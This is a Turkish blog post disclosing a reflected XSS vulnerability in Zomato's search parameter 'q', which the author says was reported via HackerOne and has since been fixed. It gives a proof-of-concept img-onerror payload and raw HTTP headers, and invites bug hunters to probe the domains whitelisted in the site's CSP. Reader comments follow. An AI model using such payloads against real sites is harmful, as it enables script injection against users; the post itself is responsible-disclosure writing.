Zomato Reflected XSS

Merhabalar,

Baştan belirteyim, ben bug hunter felan değilim. Sadece bir sebepten dolayı ziyaret ettiğim sitelere bazen kabaca bi bakıveriyorum. Zamanında Zomato’da bir mekan bakarken XSS tespit edip mail atmıştım. Sağolsunlar kendileri ilgilenip zafiyeti fixlemişlerdi. Tabi ozamanlar Zomato’nun Hackerone profili yoktu. Hackerone hesabı açtıktan sonra, attığım maili Hackerone üzerinden report ettim ve zafiyet fixed olmasına rağmen hatırlayıp zafiyeti kabul etmişler. İş artık “legal” olduğundan blogumda paylaşmak istedim.

Hackerone Activity: https://hackerone.com/om3rcitak#activity-832447

Teknik Detaylar

Vulnerability Name : Reflected XSS
Vulnerable page(s) : https://www.zomato.com/*/*/*
Vulnerable parameter(s) : “q”
Payload : asd”}}’><img src=x onerror=alert(‘[email protected]3rcitak’)
Request Headers;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: tr-TR
Cache-Control: max-age=0
Connection: keep-alive
Cookie: *********************
DNT: 1
Host: www.zomato.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; en-US) AppleWebKit/535.12 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/535.12

Response Headers;

Accept-Ranges:bytes
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection:keep-alive
Content-Encoding:gzip
Content-Length:35705
Content-Security-Policy:frame-ancestors ‘self’; default-src *; font-src *; img-src *; script-src ‘self’ ‘unsafe-inline’ ‘unsafe-eval’ *.twitter.com *.recruiterbox.com *.zomato.com *.gstatic.com *.googleapis.com *.google.com *.facebook.com *.doubleclick.net *.nr-data.net *.newrelic.com *.google-analytics.com *.akamaihd.net *.zmtcdn.com *.googletagmanager.com *.facebook.net *.googleadservices.com *.cdninstagram.com *.googlesyndication.com *.inspectlet.com *.spreedly.com *.instagram.com *.twimg.com *.mouseflow.com *.usersnap.com d3mvnvhjmkxpjz.cloudfront.net; style-src * ‘unsafe-inline’;
Content-Type:text/html; charset=UTF-8
Pragma:no-cache
Server:Zomato
Strict-Transport-Security:max-age=31536000
Vary:Accept-Encoding
X-Content-Type-Options:nosniff
X-Varnish:369103436
X-XSS-Protection:1; mode=block; report=https://www.zomato.com/cspreport.php

zomato xss

Son Olarak Bug Hunter’lara Sesleniyorum!

Dikkat ettiyseniz Response Content-Security-Policy Header’ında bir dünya site var. Kurcalayın, belki size ekmek çıkar 🙂 Selametle…

Comments on this post

  1. Murrrrrrrrat

    Eline saglik +rep. Ya nasil usenmiyosunuz blog yazmaya valla helal olsun.

    • maili c/p yaptım oğlum görende tez yazdım sancak he 🙂

      • Murrrrrrrat

        Takılıyorum bro. Eline sağlık daha çok write-up ve blogpost bekliyoruz ona göre ^^

  2. Umut

    Eline sağlık sadce senden bir ricam olucak firefox’da kullandığınız araçları paylaşırsanız sevinirim sağolun 🙂

  3. Gizli Bir Kulanıcı

    request ve responseyi göstermekteki amaç ney ben anlamadım ? yardımcı olabilirmisinz ?

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackbacks and Pinbacks

No trackbacks.

TrackBack URL